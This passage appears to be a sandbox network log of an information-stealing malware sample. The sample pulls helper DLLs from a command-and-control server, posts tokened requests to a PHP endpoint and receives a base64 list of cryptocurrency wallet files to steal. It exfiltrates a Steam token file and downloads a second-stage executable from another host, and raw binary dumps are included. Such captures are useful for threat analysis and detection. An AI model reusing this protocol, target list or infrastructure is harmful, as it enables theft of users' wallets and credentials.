Dec 7, 2024 12:59:47.059411049 CET	95	OUT	GET /68b591d6548ec281/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 7, 2024 12:59:47.502203941 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:47 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Dec 7, 2024 12:59:48.248819113 CET	91	OUT	GET /68b591d6548ec281/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 7, 2024 12:59:48.691565990 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:48 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Dec 7, 2024 12:59:51.813425064 CET	95	OUT	GET /68b591d6548ec281/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 7, 2024 12:59:52.256510973 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:52 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Dec 7, 2024 12:59:52.939944983 CET	99	OUT	GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 7, 2024 12:59:53.383656979 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:53 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Dec 7, 2024 12:59:53.851003885 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFIIJJJDGCBAAKFIIECG Host: 185.215.113.206 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Dec 7, 2024 12:59:54.792304993 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 7, 2024 12:59:55.192065954 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBGHCGCAEBFIJKFIDBGH Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 42 47 48 43 47 43 41 45 42 46 49 4a 4b 46 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 63 35 64 64 35 36 64 31 35 37 66 63 30 64 34 37 31 64 61 39 66 39 33 36 35 63 38 38 33 33 66 30 36 33 63 61 35 33 64 37 39 64 33 62 34 30 34 65 34 31 36 38 31 35 64 34 35 30 38 36 32 36 33 36 61 39 63 38 66 62 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 48 43 47 43 41 45 42 46 49 4a 4b 46 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 48 43 47 43 41 45 42 46 49 4a 4b 46 49 44 42 47 48 2d 2d 0d 0a Data Ascii: ------FBGHCGCAEBFIJKFIDBGHContent-Disposition: form-data; name="token"0cc5dd56d157fc0d471da9f9365c8833f063ca53d79d3b404e416815d450862636a9c8fb------FBGHCGCAEBFIJKFIDBGHContent-Disposition: form-data; name="message"wallets------FBGHCGCAEBFIJKFIDBGH--
Dec 7, 2024 12:59:55.637667894 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:55 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Dec 7, 2024 12:59:55.832945108 CET	467	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAEGCBFHJDGCBFHDAFB Host: 185.215.113.206 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 63 35 64 64 35 36 64 31 35 37 66 63 30 64 34 37 31 64 61 39 66 39 33 36 35 63 38 38 33 33 66 30 36 33 63 61 35 33 64 37 39 64 33 62 34 30 34 65 34 31 36 38 31 35 64 34 35 30 38 36 32 36 33 36 61 39 63 38 66 62 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 42 2d 2d 0d 0a Data Ascii: ------HCAEGCBFHJDGCBFHDAFBContent-Disposition: form-data; name="token"0cc5dd56d157fc0d471da9f9365c8833f063ca53d79d3b404e416815d450862636a9c8fb------HCAEGCBFHJDGCBFHDAFBContent-Disposition: form-data; name="message"files------HCAEGCBFHJDGCBFHDAFB--
Dec 7, 2024 12:59:56.278039932 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 7, 2024 12:59:56.298132896 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGDHIEGCFHCGDGCAECBG Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 63 35 64 64 35 36 64 31 35 37 66 63 30 64 34 37 31 64 61 39 66 39 33 36 35 63 38 38 33 33 66 30 36 33 63 61 35 33 64 37 39 64 33 62 34 30 34 65 34 31 36 38 31 35 64 34 35 30 38 36 32 36 33 36 61 39 63 38 66 62 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CGDHIEGCFHCGDGCAECBGContent-Disposition: form-data; name="token"0cc5dd56d157fc0d471da9f9365c8833f063ca53d79d3b404e416815d450862636a9c8fb------CGDHIEGCFHCGDGCAECBGContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CGDHIEGCFHCGDGCAECBGContent-Disposition: form-data; name="file"------CGDHIEGCFHCGDGCAECBG--
Dec 7, 2024 12:59:57.231245041 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 7, 2024 12:59:57.258877039 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHI Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 63 35 64 64 35 36 64 31 35 37 66 63 30 64 34 37 31 64 61 39 66 39 33 36 35 63 38 38 33 33 66 30 36 33 63 61 35 33 64 37 39 64 33 62 34 30 34 65 34 31 36 38 31 35 64 34 35 30 38 36 32 36 33 36 61 39 63 38 66 62 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 2d 2d 0d 0a Data Ascii: ------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="token"0cc5dd56d157fc0d471da9f9365c8833f063ca53d79d3b404e416815d450862636a9c8fb------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="message"ybncbhylepme------DGHJECAFIDAFHJKFCGHI--
Dec 7, 2024 12:59:57.704978943 CET	271	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 68 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49829	185.215.113.16	80	6564	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 12:59:57.955688953 CET	80	OUT	GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Dec 7, 2024 12:59:59.171195984 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 07 Dec 2024 11:59:58 GMT Content-Type: application/octet-stream Content-Length: 3250176 Last-Modified: Sat, 07 Dec 2024 11:47:15 GMT Connection: keep-alive ETag: "675435c3-319800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 a0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf1@1E2@Wk`11 @.rsrc@.idata @uxwkwojh**@xuxxpxvl1r1@.taggant01"v1@
Dec 7, 2024 12:59:59.171406984 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 7, 2024 12:59:59.171418905 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 7, 2024 12:59:59.172175884 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 7, 2024 12:59:59.172188044 CET	1236	IN	Data Raw: e3 30 d5 51 dc 81 cc 9f 13 d5 8f c7 14 ad f7 e1 cc 71 18 39 27 f0 19 51 bc f0 6c 24 c0 57 2c b9 03 31 d5 51 dc 61 ce 9f 13 d5 ef c7 14 ad f7 41 cd 71 18 39 c7 f0 19 51 bc f0 6c 24 c0 57 14 b9 73 31 d5 51 dc d1 31 9f 13 d5 cf c7 14 ad f7 a1 cd 71 Data Ascii: 0Qq9'Ql$W,1QaAq9Ql$Ws1Q1q9Ql$W k1QI/q9Ql$WW1Q1aq9Ql$W,1Q1oq9GQl$W,1QO!q9gQl$W1Qq
Dec 7, 2024 12:59:59.172945976 CET	1236	IN	Data Raw: 67 ec 19 51 bc f0 6c 24 c0 57 14 b9 4f 33 d5 51 dc 99 cc 9f 13 d5 af b8 14 ad f7 81 3b 71 18 39 07 ec 19 51 bc f0 6c 24 c0 57 14 b9 47 33 d5 51 dc 1d c5 9f 13 d5 8f b8 14 ad f7 e1 3b 71 18 39 27 eb 19 51 bc f0 6c 24 c0 57 10 b9 bf 33 d5 51 dc e1 Data Ascii: gQl$WO3Q;q9Ql$WG3Q;q9'Ql$W3QA<q9Ql$W3Q3<q9Ql$W3Q/=q9Ql$W,3Qa=q9Ql$W3Qo=q9GQl$W3QI2
Dec 7, 2024 12:59:59.172956944 CET	776	IN	Data Raw: 13 d5 6f bc 14 ad f7 c1 29 71 18 39 47 e7 19 51 bc f0 6c 24 c0 57 d8 b9 63 36 d5 51 dc a9 31 9f 13 d5 4f bc 14 ad f7 21 2a 71 18 39 67 e7 19 51 bc f0 6c 24 c0 57 e8 b9 9b 36 d5 51 dc cd c5 9f 13 d5 af bd 14 ad f7 81 2a 71 18 39 07 e7 19 51 bc f0 Data Ascii: o)q9GQl$Wc6Q1O!q9gQl$W6Qq9Ql$W(6Q!2*q9'Ql$W36QaA+q9Ql$W,{7Qy+q9Ql$Wk7QY/,q9Ql$W7Qma,q9Ql
Dec 7, 2024 12:59:59.173885107 CET	1236	IN	Data Raw: 22 71 18 39 47 e4 19 51 bc f0 6c 24 c0 57 2c b9 67 39 d5 51 dc d9 cd 9f 13 d5 4f b3 14 ad f7 21 23 71 18 39 67 e4 19 51 bc f0 6c 24 c0 57 2c b9 57 39 d5 51 dc 61 c9 9f 13 d5 af b0 14 ad f7 81 23 71 18 39 07 e4 19 51 bc f0 6c 24 c0 57 10 b9 47 39 Data Ascii: "q9GQl$W,g9QO!#q9gQl$W,W9Qa#q9Ql$WG9Q3#q9'Ql$W$9QA$q9Ql$W9Q$q9Ql$W9Q1/%q9Ql$W 9Qa%q9Ql$W9
Dec 7, 2024 12:59:59.173897028 CET	1236	IN	Data Raw: 39 6e 14 1e 55 b1 ef d0 48 ad 56 53 a7 b3 d4 51 d6 f9 6c 24 c0 f9 6c 24 c0 7e 70 33 85 ae 1f a8 d6 f9 6c 24 c0 f9 6c 24 c0 42 93 45 ba ac 85 59 8e de e6 39 0c 3e 19 51 96 f1 10 da c9 4b fd 13 08 ad 53 24 c0 f9 6c 24 c0 42 93 45 ba 38 85 59 02 44 Data Ascii: 9nUHVSQl$l$~p3l$l$BEY9>QKS$l$BE8YDXe^+PCp]J[$l$l$l$BEiqQ}mss}'QQHVQ}p%l$l$l$BE,@pQr+U&Rl$BE8a}W^QePr
